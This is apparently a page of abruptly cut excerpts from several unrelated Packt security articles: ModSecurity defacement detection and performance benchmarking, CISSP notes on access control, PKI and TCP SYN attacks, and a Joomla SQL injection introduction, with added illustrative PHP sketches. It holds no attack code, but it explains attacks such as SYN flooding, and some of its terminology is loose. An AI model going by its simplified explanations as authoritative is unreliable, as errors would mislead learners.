SecRule REMOTE_ADDR ".*" "phase:4,deny,chain,t:md5,t:hexEncode,exec:/usr/bin/emailadmin.sh"
SecRule RESPONSE_BODY "!@contains %{MATCHED_VAR}"

We are placing the rule in phase 4 since this is required when we want to inspect the response body. The exec action is used to send an email to the website administrator to let him know of the website defacement.
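For sites that are not running JSP, the same token can be generated in PHP. This is a minimal sketch under the same assumptions as the JSP snippet above (white page background, token derived from the visitor's IP address); it is an illustration, not code from the article.

```php
<?php
// Derive the per-visitor token from the client IP address, as in the
// JSP example: an MD5 hash rendered as a lowercase hex string, which
// matches the t:md5,t:hexEncode transformation chain in the rule above.
$tokenPlaintext = $_SERVER['REMOTE_ADDR'];
$tokenHashed = md5($tokenPlaintext);

// Emit the token in white text so it is invisible on a white background,
// but still present in the response body for ModSecurity to verify.
echo "<span style='color: white'>" . $tokenHashed . "</span>";
```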

Ways to improve performance of your server in ModSecurity 2.5

Packt
30 Nov 2009
13 min read
A typical HTTP request

To get a better picture of the possible delay incurred when using a web application firewall, it helps to understand the anatomy of a typical HTTP request, and what processing time a typical web page download will incur. This will help us compare any added ModSecurity processing time to the overall time for the entire request.

When a user visits a web page, his browser first connects to the server and downloads the main resource requested by the user (for example, an .html file). It then parses the downloaded file to discover any additional files, such as images or scripts, that it must download to be able to render the page. Therefore, from the point of view of a web browser, the following sequence of events happens for each file:

1. Connect to web server.
2. Request required file.
3. Wait for server to start serving file.
4. Download file.

Each of these steps adds latency, or delay, to the request. A typical download time for a web page is on the order of hundreds of milliseconds per file for a home cable/DSL user. This can be slower or faster, depending on the speed of the connection and the geographical distance between the client and server.

If ModSecurity adds any delay to the page request, it will be to the server processing time, or in other words the time from when the client has connected to the server to when the last byte of content has been sent out to the client.

Another aspect that needs to be kept in mind is that ModSecurity will increase the memory usage of Apache. In what is probably the most common Apache configuration, known as "prefork", Apache starts one new child process for each active connection to the server. This means that the number of Apache instances increases and decreases depending on the number of client connections to the server. As the total memory usage of Apache depends on the number of child processes running and the memory usage of each child process, we should look at the way ModSecurity affects the memory usage of Apache.

A real-world performance test

In this section we will run a performance test on a real web server running Apache 2.2.8 on a Fedora Linux server (kernel 2.6.25). The server has an Intel Xeon 2.33 GHz dual-core processor and 2 GB of RAM. We will start out benchmarking the server when it is running just Apache without having ModSecurity enabled. We will then run our tests with ModSecurity enabled but without any rules loaded. Finally, we will test ModSecurity with a ruleset loaded so that we can draw conclusions about how the performance is affected. The rules we will be using come supplied with ModSecurity and are called the "core ruleset".

The core ruleset

The ModSecurity core ruleset contains over 120 rules and is shipped with the default ModSecurity source distribution (it's contained in the rules sub-directory). This ruleset is designed to provide "out of the box" protection against some of the most common web attacks used today. Here are some of the things that the core ruleset protects against:

- Suspicious HTTP requests (for example, missing User-Agent or Accept headers)
- SQL injection
- Cross-Site Scripting (XSS)
- Remote code injection
- File disclosure

We will examine these methods of attack, but for now, let's use the core ruleset and examine how enabling it impacts the performance of your web service.

Installing the core ruleset

To install the core ruleset, create a new sub-directory named modsec under your Apache conf directory (the location will vary depending on your distribution).
Then copy all the .conf files from the rules sub-directory of the source distribution to the new modsec directory:

mkdir /etc/httpd/conf/modsec
cp /home/download/modsecurity-apache/rules/modsecurity_crs_*.conf /etc/httpd/conf/modsec

Finally, enter the following line in your httpd.conf file and restart Apache to make it read the new rule files:

# Enable ModSecurity core ruleset
Include conf/modsec/*.conf

Putting the core rules in a separate directory makes it easy to disable them—all you have to do is comment out the above Include line in httpd.conf, restart Apache, and the rules will be disabled.

Making sure it works

The core ruleset contains a file named modsecurity_crs_10_config.conf. This file contains some of the basic configuration directives needed to turn on the rule engine and configure request and response body access. Since we have already configured these directives, we do not want this file to conflict with our existing configuration, and so we need to disable it. To do this, we simply need to rename the file so that it has a different extension, as Apache only loads *.conf files with the Include directive we used above:

$ mv modsecurity_crs_10_config.conf modsecurity_crs_10_config.conf.disabled

Once we have restarted Apache, we can test that the core ruleset is loaded by attempting to access a URL that it should block. For example, try surfing to http://yourserver/ftp.exe and you should get the error message Method Not Implemented, ensuring that the core rules are loaded.

Performance testing basics

So what effect does loading the core ruleset have on web application response time, and how do we measure this? We could measure the response time for a single request with and without the core ruleset loaded, but this wouldn't have any statistical significance—it could happen that just as one of the requests was being processed, the server started to execute a processor-intensive scheduled task, causing a delayed response time. The best way to compare the response times is to issue a large number of requests and look at the average time it takes for the server to respond.

An excellent tool—and the one we are going to use to benchmark the server in the following tests—is called httperf. Written by David Mosberger of Hewlett Packard Research Labs, httperf allows you to simulate high workloads against a web server and obtain statistical data on the performance of the server. You can obtain the program at http://www.hpl.hp.com/research/linux/httperf/ where you'll also find a useful manual page in the PDF file format and a link to the research paper published together with the first version of the tool.

Using httperf

We'll run httperf with the options --hog (use as many TCP ports as needed), --uri /index.html (request the static web page index.html) and --num-conn 1000 (initiate a total of 1000 connections). We will be varying the number of requests per second (specified using --rate) to see how the server responds under different workloads.
This is what the typical output from httperf looks like when run with the above options:

$ ./httperf --hog --server=bytelayer.com --uri /index.html --num-conn 1000 --rate 50
Total: connections 1000 requests 1000 replies 1000 test-duration 20.386 s
Connection rate: 49.1 conn/s (20.4 ms/conn, <=30 concurrent connections)
Connection time [ms]: min 404.1 avg 408.2 max 591.3 median 404.5 stddev 16.9
Connection time [ms]: connect 102.3
Connection length [replies/conn]: 1.000
Request rate: 49.1 req/s (20.4 ms/req)
Request size [B]: 95.0
Reply rate [replies/s]: min 46.0 avg 49.0 max 50.0 stddev 2.0 (4 samples)
Reply time [ms]: response 103.1 transfer 202.9
Reply size [B]: header 244.0 content 19531.0 footer 0.0 (total 19775.0)
Reply status: 1xx=0 2xx=1000 3xx=0 4xx=0 5xx=0
CPU time [s]: user 2.37 system 17.14 (user 11.6% system 84.1% total 95.7%)
Net I/O: 951.9 KB/s (7.8*10^6 bps)
Errors: total 0 client-timo 0 socket-timo 0 connrefused 0 connreset 0
Errors: fd-unavail 0 addrunavail 0 ftab-full 0 other 0

The output shows us the number of TCP connections httperf initiated per second ("Connection rate"), the rate at which it requested files from the server ("Request rate"), and the actual reply rate that the server was able to provide ("Reply rate"). We also get statistics on the reply time—the "reply time – response" is the time taken from when the first byte of the request was sent to the server to when the first byte of the reply was received—in this case around 103 milliseconds. The transfer time is the time to receive the entire response from the server.

The page we will be requesting in this case, index.html, is 20 KB in size, which is a pretty average size for an HTML document. httperf requests the page one time per connection and doesn't follow any links in the page to download additional embedded content or script files, so the number of such links in the page is of no relevance to our test.

Getting a baseline: Testing without ModSecurity

When running benchmarking tests like this one, it's always important to get a baseline result so that you know the performance of your server when the component you're measuring is not involved. In our case, we will run the tests against the server when ModSecurity is disabled. This will allow us to tell which impact, if any, running with ModSecurity enabled has on the server.

Response time

The following chart shows the response time, in milliseconds, of the server when it is running without ModSecurity. The number of requests per second is on the horizontal axis. As we can see, the server consistently delivers response times of around 300 milliseconds until we reach about 75 requests per second. Above this, the response time starts increasing, and at around 500 requests per second the response time is almost a second per request. This data is what we will use for comparison purposes when looking at the response time of the server after we enable ModSecurity.

Memory usage

Finding the memory usage on a Linux system can be quite tricky. Simply running the Linux top utility and looking at the amount of free memory doesn't quite cut it, and the reason is that Linux tries to use almost all free memory as a disk cache. So even on a system with several gigabytes of memory and no memory-hungry processes, you might see a free memory count of only 50 MB or so. Another problem is that Apache uses many child processes, and to accurately measure the memory usage of Apache we need to sum the memory usage of each child process.
What we need is a way to measure the memory usage of all the Apache child processes so that we can see how much memory the web server truly uses. To solve this, here is a small shell script that I have written that runs the ps command to find all the Apache processes. It then passes the PID of each Apache process to pmap to find the memory usage, and finally uses awk to extract the memory usage (in KB) for summation. The result is that the memory usage of Apache is printed to the terminal. The actual shell command is only one long line, but I've put it into a file called apache_mem.sh to make it easier to use:

#!/bin/sh
# apache_mem.sh
# Calculate the Apache memory usage
ps -ef | grep httpd | grep ^apache | awk '{ print $2 }' | xargs pmap -x | grep 'total kB' | awk '{ print $3 }' | awk '{ sum += $1 } END { print sum }'

Now, let's use this script to look at the memory usage of all of the Apache processes while we are running our performance test. The following graph shows the memory usage of Apache as the number of requests per second increases. Apache starts out consuming about 300 MB of memory. Memory usage grows steadily, and at about 150 requests per second it starts climbing more rapidly. At 500 requests per second, the memory usage is over 2.4 GB—more than the amount of physical RAM of the server. The fact that this is possible is because of the virtual memory architecture that Linux (and all modern operating systems) use. When there is no more physical RAM available, the kernel starts swapping memory pages out to disk, which allows it to continue operating. However, since reading and writing to a hard drive is much slower than to memory, this starts slowing down the server significantly, as evidenced by the increase in response time seen in the previous graph.

CPU usage

In both of the tests above, the server's CPU usage was consistently around 1 to 2%, no matter what the request rate was. You might have expected a graph of CPU usage in the previous and subsequent tests, but while I measured the CPU usage in each test, it turned out to run at this low utilization rate for all tests, so a graph would not be very useful. Suffice it to say that in these tests, CPU usage was not a factor.

ModSecurity without any loaded rules

Now, let's enable ModSecurity—but without loading any rules—and see what happens to the response time and memory usage. Both SecRequestBodyAccess and SecResponseBodyAccess were set to On, so if there is any performance penalty associated with buffering requests and responses, we should see this now that we are running ModSecurity without any rules.

The following graph shows the response time of Apache with ModSecurity enabled. We can see that the response time graph looks very similar to the response time graph we got when ModSecurity was disabled. The response time starts increasing at around 75 requests per second, and once we pass 350 requests per second, things really start going downhill.

The memory usage graph is also almost identical to the previous one: Apache uses around 1.3 MB extra per child process when ModSecurity is loaded, which equals a total increase of memory usage of 26 MB for this particular setup. Compared to the total amount of memory Apache uses when the server is idle (around 300 MB), this equals an increase of about 10%.

ModSecurity with the core ruleset loaded

Now for the really interesting test: we'll run httperf against ModSecurity with the core ruleset loaded and look at what that does to the response time and memory usage.
Response time

The following graph shows the server response time with the core ruleset loaded. At first, the response time is around 340 ms, which is about 35 ms slower than in previous tests. Once the request rate gets above 50, the server response time starts deteriorating. As the request rate grows, the response time gets worse and worse, reaching a full 5 seconds at 100 requests per second. I have capped the graph at 100 requests per second, as the server performance has already deteriorated enough at this point to allow us to see the trend.

We see that the point at which the response time starts deteriorating has gone down from 75 to 50 requests per second now that we have enabled the core ruleset. This equals a reduction of 33% in the maximum number of requests per second the server can handle.
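httperf is the right tool for serious load testing, but if you only want a rough before-and-after comparison of average response time, a short script can serve as a sanity check. The following PHP sketch (the URL and request count are placeholders) measures the full client-side request time with curl, which is coarser than httperf's separate connect/response/transfer figures but enough to spot a large regression.

```php
<?php
// Hypothetical target and sample size; adjust for your own server.
$url = 'http://www.example.com/index.html';
$requests = 100;

$total = 0.0;
for ($i = 0; $i < $requests; $i++) {
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);

    $start = microtime(true);
    curl_exec($ch);
    $total += microtime(true) - $start;

    curl_close($ch);
}

printf("Average response time over %d requests: %.1f ms\n",
       $requests, ($total / $requests) * 1000);
```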

CISSP: Security Measures for Access Control

Packt
27 Nov 2009
4 min read
Knowledge requirements

A candidate appearing for the CISSP exam should have knowledge in the following areas that relate to access control:

- Control access by applying concepts, methodologies, and techniques
- Identify, evaluate, and respond to access control attacks such as brute force attacks, dictionary attacks, spoofing, denial of service, and so on
- Design, coordinate, and evaluate penetration test(s)
- Design, coordinate, and evaluate vulnerability test(s)

The approach

In accordance with the knowledge expected in the CISSP exam, this domain is broadly grouped under five sections:

- Section 1: The Access Control domain consists of many concepts, methodologies, and some specific techniques that are used as best practices. This section covers some of the basic concepts, access control models, and a few examples of access control techniques.
- Section 2: Authentication processes are critical for controlling access to facilities and systems. This section looks into important concepts that establish the relationship between access control mechanisms and authentication processes.
- Section 3: A system or facility becomes compromised primarily through unauthorized access, either through the front door or the back door. We'll see some of the common and popular attacks on access control mechanisms, and also learn about the prevalent countermeasures to such attacks.
- Section 4: An IT system consists of an operating system, applications, and embedded software in devices, to name a few. Vulnerabilities in such software are nothing but holes or errors. In this section we see some of the common vulnerabilities in IT systems, vulnerability assessment techniques, and vulnerability management principles.
- Section 5: Vulnerabilities are exploitable, in the sense that IT systems can be compromised and unauthorized access can be gained by exploiting the vulnerabilities. Penetration testing, or ethical hacking, is an activity that tests the exploitability of vulnerabilities for gaining unauthorized access to an IT system.

Today, we'll quickly review some of the important concepts in Sections 1, 2, and 3.

Access control concepts, methodologies, and techniques

Controlling access to the information systems and the information processing facilities by means of administrative, physical, and technical safeguards is the primary goal of the access control domain. The following topics provide insight into some of the important access control related concepts, methodologies, and techniques.

Basic concepts

One of the primary concepts in access control is to understand the subject and the object. A subject may be a person, a process, or a technology component that either seeks access or controls the access. For example, an employee trying to access his business email account is a subject. Similarly, the system that verifies the credentials, such as username and password, is also termed a subject. An object can be a file, data, physical equipment, or premises which need controlled access. For example, the email stored in the mailbox is an object that a subject is trying to access. Controlling access to an object by a subject is the core requirement of an access control process and its associated mechanisms. In a nutshell, a subject either seeks or controls access to an object.
An access control mechanism can be classified broadly into the following two types:

- Context-dependent access control: If access to an object is controlled based on certain contextual parameters, such as location, time, sequence of responses, access history, and so on, then it is known as context-dependent access control. In this type of control, the value of the asset being accessed is not a primary consideration. Providing the username and password combination followed by a challenge-and-response mechanism such as CAPTCHA, filtering access based on MAC addresses in wireless connections, or a firewall filtering data based on packet analysis are all examples of context-dependent access control mechanisms.

  Completely Automated Public Turing test to tell Computers and Humans Apart (CAPTCHA) is a challenge-response test to ensure that the input to an access control system is supplied by humans and not by machines. This mechanism is predominantly used by websites to prevent web robots (WebBots) from accessing the controlled sections of the site by brute force methods. The following is an example of CAPTCHA:

- Content-dependent access control: If access is provided based on the attributes or content of an object, then it is known as content-dependent access control. In this type of control, the value and attributes of the content being accessed determine the control requirements. For example, hiding or showing menus in an application, views in databases, and access to confidential information are all content-dependent.
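To make the distinction more concrete, here is a minimal PHP sketch of the two kinds of checks. It is purely illustrative and not taken from the article: the function names, the office-hours window, the internal network prefix, and the classification labels are all hypothetical.

<?php
// Context-dependent check: the decision looks at *how* and *when* the request
// is made (time of day, source network), not at the value of the object itself.
// All names and thresholds below are hypothetical.
function contextAllowsAccess($clientIp, $hourOfDay)
{
    $withinOfficeHours = ($hourOfDay >= 8 && $hourOfDay <= 18);
    $fromInternalNet   = (strpos($clientIp, '10.0.') === 0);
    return $withinOfficeHours && $fromInternalNet;
}

// Content-dependent check: the decision looks at an attribute of the object
// itself (here, a classification label attached to the record).
function contentAllowsAccess($record, $userClearance)
{
    $levels = array('public' => 0, 'internal' => 1, 'confidential' => 2);
    return $levels[$userClearance] >= $levels[$record['classification']];
}

// Example usage
$ip   = isset($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : '10.0.0.5';
$hour = (int) date('G');
$doc  = array('title' => 'Payroll', 'classification' => 'confidential');

if (contextAllowsAccess($ip, $hour) && contentAllowsAccess($doc, 'internal')) {
    echo "Access granted\n";
} else {
    echo "Access denied\n";
}
?>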

Public Key Infrastructure (PKI) and other Concepts in Cryptography for CISSP Exam

Packt
28 Oct 2009
10 min read
Public key infrastructure

Public Key Infrastructure (PKI) is a framework that enables the integration of various services related to cryptography. The aim of PKI is to provide confidentiality, integrity, access control, authentication, and, most importantly, non-repudiation.

Non-repudiation is a concept, or a way, to ensure that the sender or receiver of a message cannot deny either sending or receiving such a message in the future. One of the important audit checks for non-repudiation is a time stamp. The time stamp is an audit trail that records the time the message was sent by the sender and the time it was received by the receiver.

Encryption and decryption, digital signature, and key exchange are the three primary functions of a PKI. RSA and elliptic curve algorithms provide all three primary functions: encryption and decryption, digital signatures, and key exchanges. The Diffie-Hellman algorithm supports key exchanges, while the Digital Signature Standard (DSS) is used for digital signatures.

Public key encryption is the encryption methodology used in PKI and was initially proposed by Diffie and Hellman in 1976. The algorithm is based on mathematical functions and uses asymmetric cryptography, that is, a pair of keys. The image above represents a simple document-signing function.

In PKI, every user has two keys known as a "pair of keys". One key is known as the private key and the other as the public key. The private key is never revealed and is kept with the owner, while the public key is accessible by everyone and is stored in a key repository. A key can be used to encrypt as well as to decrypt a message. Most importantly, a message that is encrypted with a private key can only be decrypted with the corresponding public key; similarly, a message that is encrypted with a public key can only be decrypted with the corresponding private key.

In the example image above, Bob wants to send a confidential document to Alice electronically. Bob has four issues to address before this electronic transmission can occur:

- Ensuring the contents of the document are encrypted such that the document is kept confidential.
- Ensuring the document is not altered during transmission.
- Since Alice does not know Bob, he has to somehow prove that the document is indeed sent by him.
- Ensuring Alice receives the document and that she cannot deny receiving it in the future.

PKI supports all four of the above requirements with methods such as secure messaging, message digests, digital signatures, and non-repudiation services.

Secure messaging

To ensure that the document is protected from eavesdropping and not altered during transmission, Bob will first encrypt the document using Alice's public key. This ensures two things: one, that the document is encrypted, and two, that only Alice can open it, as opening the document requires Alice's private key. To summarize, encryption is accomplished using the public key of the receiver, and the receiver decrypts with his or her private key. In this method, Bob can ensure that the document is encrypted and that only the intended receiver (Alice) can open it. However, Bob cannot ensure whether the contents are altered (integrity) during transmission by document encryption alone.

Message digest

In order to ensure that the document is not altered during transmission, Bob performs a hash function on the document. The hash value is a computational value based on the contents of the document. This hash value is known as the message digest.
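The overall workflow Bob follows (encrypt for the receiver, hash for integrity, sign for authenticity, verify on the receiving side) can be sketched with PHP's OpenSSL extension. This is a minimal illustration, not the article's own example; it assumes the OpenSSL extension and the OPENSSL_ALGO_SHA256 constant are available, and it uses a short message so that it fits within a single RSA block. The signing step used here is explained in the next section.

<?php
// Generate key pairs for Alice and Bob (in a real PKI these would be issued
// and certified through a Certification Authority).
$alice = openssl_pkey_new(array('private_key_bits' => 2048,
                                'private_key_type' => OPENSSL_KEYTYPE_RSA));
$bob   = openssl_pkey_new(array('private_key_bits' => 2048,
                                'private_key_type' => OPENSSL_KEYTYPE_RSA));
$alicePub = openssl_pkey_get_details($alice);
$bobPub   = openssl_pkey_get_details($bob);

$document = 'Quarterly report: confidential';

// 1. Confidentiality: Bob encrypts with Alice's PUBLIC key.
openssl_public_encrypt($document, $ciphertext, $alicePub['key']);

// 2. Integrity: Bob computes a message digest of the document.
$digest = hash('sha256', $document);

// 3. Authenticity: Bob signs the digest with his PRIVATE key.
openssl_sign($digest, $signature, $bob, OPENSSL_ALGO_SHA256);

// --- On Alice's side ---
// Decrypt with her private key, recompute the digest, verify Bob's signature.
openssl_private_decrypt($ciphertext, $plaintext, $alice);
$recomputed = hash('sha256', $plaintext);
$valid = openssl_verify($recomputed, $signature, $bobPub['key'], OPENSSL_ALGO_SHA256);

echo ($plaintext === $document && $valid === 1)
    ? "Document intact and signed by Bob\n"
    : "Verification failed\n";
?>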
By performing the same hash function on the decrypted document, Alice can obtain the message digest herself and compare it with the one sent by Bob to ensure that the contents are not altered. This process ensures the integrity requirement.

Digital signature

In order to prove that the document is sent by Bob to Alice, Bob needs to use a digital signature. Using a digital signature means applying the sender's private key to the message, the document, or the message digest. This process is known as signing. Only by using the sender's public key can the message be decrypted. Bob will encrypt the message digest with his private key to create a digital signature.

In the scenario illustrated in the image above, Bob will encrypt the document using Alice's public key and sign it using his digital signature. This ensures that Alice can verify that the document was sent by Bob, by verifying the digital signature (created with Bob's private key) using Bob's public key. Remember, a private key and the corresponding public key are mathematically linked. Alice can also verify that the document is not altered by validating the message digest, and can open the encrypted document using her private key.

Message authentication is an authenticity verification procedure that facilitates the verification of the integrity of the message as well as the authenticity of the source from which the message is received.

Digital certificate

By digitally signing the document, Bob has assured Alice that the document was sent by him. However, he has not yet proved that he is Bob. To prove this, Bob needs to use a digital certificate. A digital certificate is an electronic identity issued to a person, system, or organization by a competent authority after verifying the credentials of the entity. A digital certificate contains a public key that is unique to each entity, and a certification authority issues digital certificates.

In PKI, digital certificates are used for authenticity verification of an entity. An entity can be an individual, a system, or an organization. An organization that is involved in issuing, distributing, and revoking digital certificates is known as a Certification Authority (CA). A CA acts as a notary by verifying an entity's identity.

One of the important PKI standards pertaining to digital certificates is X.509. It is a standard published by the International Telecommunication Union (ITU) that specifies the standard format for digital certificates. PKI also provides key exchange functionality that facilitates the secure exchange of public keys such that the authenticity of the parties can be verified.

Key management procedures

Key management consists of four essential procedures concerning public and private keys. They are as follows:

- Secure generation of keys—ensures that private and public keys are generated in a secure manner
- Secure storage of keys—ensures that keys are stored securely
- Secure distribution of keys—ensures that keys are not lost or modified during distribution
- Secure destruction of keys—ensures that keys are destroyed completely once the useful life of the key is over

Type of keys

NIST Special Publication 800-57, titled Recommendation for Key Management - Part 1: General, specifies the following nineteen types of keys:

- Private signature key—the private key of a public key pair that is used to generate digital signatures. It is also used to provide authentication, integrity, and non-repudiation.
- Public signature verification key—the public key of the asymmetric (public) key pair that is used to verify the digital signature.
- Symmetric authentication key—used with symmetric key algorithms to provide assurance of the integrity and source of messages.
- Private authentication key—the private key of the asymmetric (public) key pair that is used to provide assurance of the integrity of information.
- Public authentication key—the public key of an asymmetric (public) key pair that is used to determine the integrity of information and to authenticate the identity of entities.
- Symmetric data encryption key—used to apply confidentiality protection to information.
- Symmetric key wrapping key—a key-encrypting key that is used to encrypt other symmetric keys.
- Symmetric and asymmetric random number generation keys—used to generate random numbers.
- Symmetric master key—a master key that is used to derive other symmetric keys.
- Private key transport key—the private key of an asymmetric (public) key pair that is used to decrypt keys that have been encrypted with the associated public key.
- Public key transport key—the public key of an asymmetric (public) key pair that is used to encrypt keys that can later be decrypted with the associated private key.
- Symmetric key agreement key—used to establish keys such as key wrapping keys and data encryption keys using a symmetric key agreement algorithm.
- Private static key agreement key—the private key of an asymmetric (public) key pair that is used to establish keys such as key wrapping keys and data encryption keys.
- Public static key agreement key—the public key of an asymmetric (public) key pair that is used to establish keys such as key wrapping keys and data encryption keys.
- Private ephemeral key agreement key—the private key of an asymmetric (public) key pair that is used only once to establish one or more keys such as key wrapping keys and data encryption keys.
- Public ephemeral key agreement key—the public key of an asymmetric (public) key pair that is used in a single key establishment transaction to establish one or more keys.
- Symmetric authorization key—used to provide privileges to an entity using symmetric cryptographic methods.
- Private authorization key—the private key of an asymmetric (public) key pair that is used to provide privileges to an entity.
- Public authorization key—the public key of an asymmetric (public) key pair that is used to verify privileges for an entity that knows the associated private authorization key.

Key management best practices

Key usage refers to using a key for a cryptographic process, and should be limited to using a single key for only one cryptographic process. This ensures that the strength of the security provided by the key is not weakened.

When a specific key is authorized for use by legitimate entities for a period of time, or the effect of a specific key for a given system is for a specific period, then that time span is known as a cryptoperiod. The purpose of defining a cryptoperiod is to limit successful cryptanalysis by a malicious entity. Cryptanalysis is the science of analyzing and deciphering codes and ciphers.
The following assurance requirements are part of the key management process:

- Integrity protection—assuring the source and format of the keying material by verification
- Domain parameter validity—assuring the parameters used by some public key algorithms during the generation of key pairs and digital signatures, and during the generation of shared secrets that are subsequently used to derive keying material
- Public key validity—assuring that the public key is arithmetically correct
- Private key possession—assuring that possession of the private key is established before the public key is used

Cryptographic algorithm and key size selection are the two important key management parameters that provide adequate protection to the system and the data throughout their expected lifetime.

Key states

A cryptographic key goes through different states from its generation to its destruction. These states are defined as key states, and the movement of a cryptographic key from one state to another is known as a key transition. NIST SP 800-57 defines the following six key states:

- Pre-activation state—the key has been generated, but not yet authorized for use
- Active state—the key may be used to cryptographically protect information
- Deactivated state—the cryptoperiod of the key has expired, but the key is still needed to perform cryptographic operations
- Destroyed state—the key has been destroyed
- Compromised state—the key has been released to or determined by an unauthorized entity
- Destroyed compromised state—the key has been destroyed after a compromise, or the compromise was discovered after the key was destroyed

Telecommunications and Network Security Concepts for CISSP Exam

Packt
28 Oct 2009
5 min read
Transport layer

The transport layer in the TCP/IP model does two things: it packages the data given out by applications into a format suitable for transport over the network, and it unpacks the data received from the network into a format suitable for applications. The process of packaging the data packets received from the applications is known as encapsulation, and the output of such a process is known as a datagram. Similarly, the process of unpacking the datagram received from the network is known as abstraction. A transport section in a protocol stack carries information in the form of datagrams, frames, and bits.

Transport layer protocols

There are many transport layer protocols that carry out the transport layer functions. The most important ones are:

- Transmission Control Protocol (TCP): a core Internet protocol that provides reliable delivery mechanisms over the Internet. TCP is a connection-oriented protocol.
- User Datagram Protocol (UDP): similar to TCP, but connectionless.

A connection-oriented protocol is a protocol that guarantees delivery of datagrams (packets) to the destination application by way of a suitable mechanism, for example, the three-way handshake (SYN, SYN-ACK, ACK) in TCP. The reliability of datagram delivery of such a protocol is high. A protocol that does not guarantee the delivery of datagrams, or packets, to the destination is known as a connectionless protocol. These protocols use only one-way communication, and the speed of datagram delivery by such protocols is high.

Other transport layer protocols are as follows:

- Sequenced Packet eXchange (SPX): SPX is part of the IPX/SPX protocol suite used in the Novell NetWare operating system. While Internetwork Packet eXchange (IPX) is a network layer protocol, SPX is a transport layer protocol.
- Stream Control Transmission Protocol (SCTP): a connection-oriented protocol similar to TCP, but it provides facilities such as multi-streaming and multi-homing for better performance and redundancy. It is used in Unix-like operating systems.
- Appletalk Transaction Protocol (ATP): a proprietary protocol developed for Apple Macintosh computers.
- Datagram Congestion Control Protocol (DCCP): as the name implies, a transport layer protocol used for congestion control. Applications include Internet telephony and video or audio streaming over the network.
- Fiber Channel Protocol (FCP): used in high-speed networking such as Gigabit networking. One of its prominent applications is the Storage Area Network (SAN). A SAN is a network architecture used for attaching remote storage devices such as tape drives and disk arrays to the local server, which facilitates the use of storage devices as if they were local devices.

In the following sections we'll review the most important protocols—TCP and UDP.

Transmission Control Protocol (TCP)

TCP is a connection-oriented protocol that is widely used in Internet communications. TCP has two primary functions: the first is the transmission of datagrams between applications, while the second relates to the controls that are necessary for ensuring reliable transmissions.
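The practical difference between connection-oriented and connectionless transport can be seen from a client's point of view with PHP's stream functions: a TCP stream only becomes usable after the connection (and its handshake) succeeds, while a UDP stream simply sends datagrams with no delivery guarantee. This is a minimal sketch; the host names and ports are placeholders.

<?php
// Connection-oriented: stream_socket_client() for tcp:// blocks until the
// three-way handshake completes (or fails), so we know the peer is reachable.
$tcp = stream_socket_client('tcp://example.com:80', $errno, $errstr, 5);
if ($tcp !== false) {
    fwrite($tcp, "HEAD / HTTP/1.0\r\nHost: example.com\r\n\r\n");
    echo fgets($tcp);   // the peer's response proves the connection exists
    fclose($tcp);
}

// Connectionless: a udp:// stream sends a datagram immediately; there is no
// handshake and no guarantee that anyone received it.
$udp = stream_socket_client('udp://example.com:9999', $errno, $errstr, 5);
if ($udp !== false) {
    fwrite($udp, "ping");   // fire-and-forget
    fclose($udp);
}
?>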
Protocol / Service: Transmission Control Protocol (TCP)
Layer(s): TCP works in the transport layer of the TCP/IP model
Applications: Applications where delivery needs to be assured, such as email, the World Wide Web (WWW), and file transfer, use TCP for transmission
Threats: Service disruption
Vulnerabilities: Half-open connections
Attacks: Denial-of-service attacks such as TCP SYN attacks; connection hijacking such as IP spoofing attacks
Countermeasures: SYN cookies; cryptographic solutions

A half-open connection is a vulnerability in the TCP implementation. TCP uses a three-way handshake to establish or terminate connections. Refer to the following illustration: in a three-way handshake, first the client (workstation) sends a request to the server (www.some_website.com). This is known as a SYN request. The server acknowledges the request by sending a SYN-ACK and, in the process, creates a buffer for that connection. The client does a final acknowledgement by sending an ACK. TCP requires this setup because the protocol needs to ensure the reliability of packet delivery.

If the client does not send the final ACK, the connection is known as half-open. Since the server has created a buffer for that connection, a certain amount of memory or server resources is consumed. If thousands of such half-open connections are created maliciously, the server's resources may be completely consumed, resulting in a denial-of-service to legitimate requests.

TCP SYN attacks are, technically, the establishment of thousands of half-open connections to consume server resources. Two actions can be taken by an attacker:

- The attacker, or malicious software, sends thousands of SYNs to the server and withholds the ACKs. This is known as SYN flooding. Depending on the capacity of the network bandwidth and the server resources, over a span of time the entire resources will be consumed, resulting in a denial-of-service.
- If the source IP were blocked by some means, then the attacker, or the malicious software, would try to spoof the source IP addresses to continue the attack. This is known as SYN spoofing.

SYN attacks such as SYN flooding and SYN spoofing can be controlled using SYN cookies with cryptographic hash functions. In this method, the server does not create the connection at the SYN-ACK stage. Instead, the server creates a cookie with the computed hash of the source IP address, source port, destination IP, destination port, and some random values based on an algorithm, and sends it as the SYN-ACK. When the server receives the ACK, it checks the details and only then creates the connection.

A cookie is a piece of information, usually in the form of a text file, sent by the server to a client. Cookies are generally stored on a client's computer and are used for purposes such as authentication, session tracking, and management.

User Datagram Protocol (UDP)

UDP is a connectionless protocol similar to TCP. However, UDP does not provide a delivery guarantee for data packets.
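Returning to the SYN cookie countermeasure described above, the core idea can be illustrated with a short PHP sketch. Real SYN cookies are computed inside the operating system's TCP stack and also encode timestamps and MSS values; the sketch below only shows how a verifiable value can be derived from the connection 4-tuple and a server secret, and all names and addresses are illustrative.

<?php
// Server-side secret; in a real TCP stack this would rotate periodically.
$secret = 'rotate-me-regularly';

// Derive a cookie from the connection 4-tuple, as in the SYN-ACK step.
function synCookie($srcIp, $srcPort, $dstIp, $dstPort, $secret)
{
    $tuple = $srcIp . '|' . $srcPort . '|' . $dstIp . '|' . $dstPort;
    // Keyed hash so that a client cannot forge a valid cookie.
    return substr(hash_hmac('sha256', $tuple, $secret), 0, 8);
}

// SYN arrives: compute the cookie and send it in the SYN-ACK.
// No per-connection buffer is allocated at this point.
$cookie = synCookie('203.0.113.7', 51515, '198.51.100.1', 80, $secret);

// ACK arrives carrying the cookie: recompute and compare before
// allocating any state for the connection.
$fromAck = synCookie('203.0.113.7', 51515, '198.51.100.1', 80, $secret);
if (hash_equals($cookie, $fromAck)) {
    echo "Cookie valid - allocate the connection now\n";
} else {
    echo "Invalid cookie - drop the ACK\n";
}
?>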

Preventing SQL Injection Attacks on your Joomla Websites

Packt
23 Oct 2009
6 min read
Introduction

Mark Twain once said, "There are only two certainties in life: death and taxes." Even in web security there is a certainty: it's not a question of if you will be attacked, but of when and how your site will be taken advantage of. There are several types of attacks that your Joomla! site may be vulnerable to, such as CSRF, buffer overflows, blind SQL Injection, denial of service, and others that are yet to be found.

The top issues in PHP-based websites are:

- Incorrect or invalid (intentional or unintentional) input
- Access control vulnerabilities
- Session hijacks and attempts on session IDs
